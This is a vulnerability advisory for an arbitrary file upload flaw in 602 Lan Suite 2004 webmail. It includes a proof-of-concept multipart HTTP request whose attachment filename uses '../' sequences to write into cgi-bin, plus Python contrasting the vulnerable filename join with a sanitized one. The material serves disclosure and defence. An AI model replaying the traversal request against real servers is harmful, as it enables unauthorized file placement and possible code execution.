Software602 602 Lan Suite Arbitrary File Upload Vulnerability
BID: 12495
Info
| Bugtraq ID: | 12495 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 08 2005 12:00AM |
| Updated: | Feb 08 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Tan Chew Keong. |
| Vulnerable: | Software602 602Pro LAN SUITE 2004 2004.0.04.1221 |
| Not Vulnerable: | |
Discussion
602 Lan Suite 2004 is reportedly affected by a vulnerability in its handling of uploaded file attachments. The application fails to properly sanitize the names of file attachments before they are uploaded, so a malicious user could supply an attachment name containing directory-traversal sequences to upload a file to an arbitrary location accessible to the affected server.
This vulnerability could lead to the execution of a malicious file on the server hosting the application.
602 Lan Suite 2004 version 2004.0.04.1221 is reportedly vulnerable; other versions may also be affected.
Exploit / POC
No exploit is required and the following proof of concept demonstrating a malicious file upload request is available:
```http
POST /mail HTTP/1.0
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------287661860715985
Content-length: 540

-----------------------------287661860715985
Content-Disposition: form-data; name="U"

6E13745843714258F86310B04D7
-----------------------------287661860715985
Content-Disposition: form-data; name="A"

ATTACHMENTS
-----------------------------287661860715985
Content-Disposition: form-data; name="FILENAME"; filename="../../../cgi-bin/a.txt"
Content-Type: text/plain

Test File
-----------------------------287661860715985
Content-Disposition: form-data; name="ATTACH"

Attach
-----------------------------287661860715985--
```
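As an added illustration that is not part of the advisory or the vendor's code, the filename handling the Discussion describes, in Python: the vulnerable join that lets the `filename` from the request above escape the attachment directory, beside a sanitizing version that confines it. The attachment directory path is an assumption; POSIX path semantics are used for portability even though the product runs on Windows.

```python
import posixpath
import re

# Assumed attachment directory; the product's real layout is not given in the advisory.
ATTACHMENT_ROOT = "/srv/lansuite/attachments"

# Constructed copy of the FILENAME part header from the advisory's proof-of-concept request.
SAMPLE_DISPOSITION = 'Content-Disposition: form-data; name="FILENAME"; filename="../../../cgi-bin/a.txt"'


def disposition_filename(header_line):
    """Extract the client-supplied filename from a Content-Disposition header line."""
    m = re.search(r'filename="([^"]*)"', header_line)
    return m.group(1) if m else None


def unsafe_destination(root, client_filename):
    """Vulnerable pattern: the client filename is joined to the root unchanged,
    so '../' segments walk out of the attachment directory."""
    return posixpath.normpath(posixpath.join(root, client_filename))


def safe_attachment_name(client_filename):
    """Reduce the client filename to a single, conservative path component."""
    # Drop any directory part, treating both '/' and '\' as separators.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Replace anything outside a conservative allow-list (NUL, control chars, spaces...).
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name)
    # No leading dots (hidden files, '..') and no trailing dots.
    name = name.strip(".")
    if not name:
        raise ValueError("attachment name is empty after sanitization")
    return name


def safe_destination(root, client_filename):
    """Hardened pattern: sanitize, then still verify the result stays under root."""
    root = posixpath.normpath(root)
    dest = posixpath.normpath(posixpath.join(root, safe_attachment_name(client_filename)))
    # Defence in depth: even a sanitized name must resolve inside the root.
    if posixpath.commonpath([root, dest]) != root:
        raise ValueError("attachment path escapes the attachment directory")
    return dest


if __name__ == "__main__":
    name = disposition_filename(SAMPLE_DISPOSITION)
    print("vulnerable:", unsafe_destination(ATTACHMENT_ROOT, name))  # /cgi-bin/a.txt
    print("hardened:  ", safe_destination(ATTACHMENT_ROOT, name))    # /srv/lansuite/attachments/a.txt
```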
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- 602LAN SUITE Web Mail Vulnerability Allows File Upload to Arbitrary Directories (SIG^2 Vulnerability Research)
- 602Pro LAN SUITE Product Page (Software602)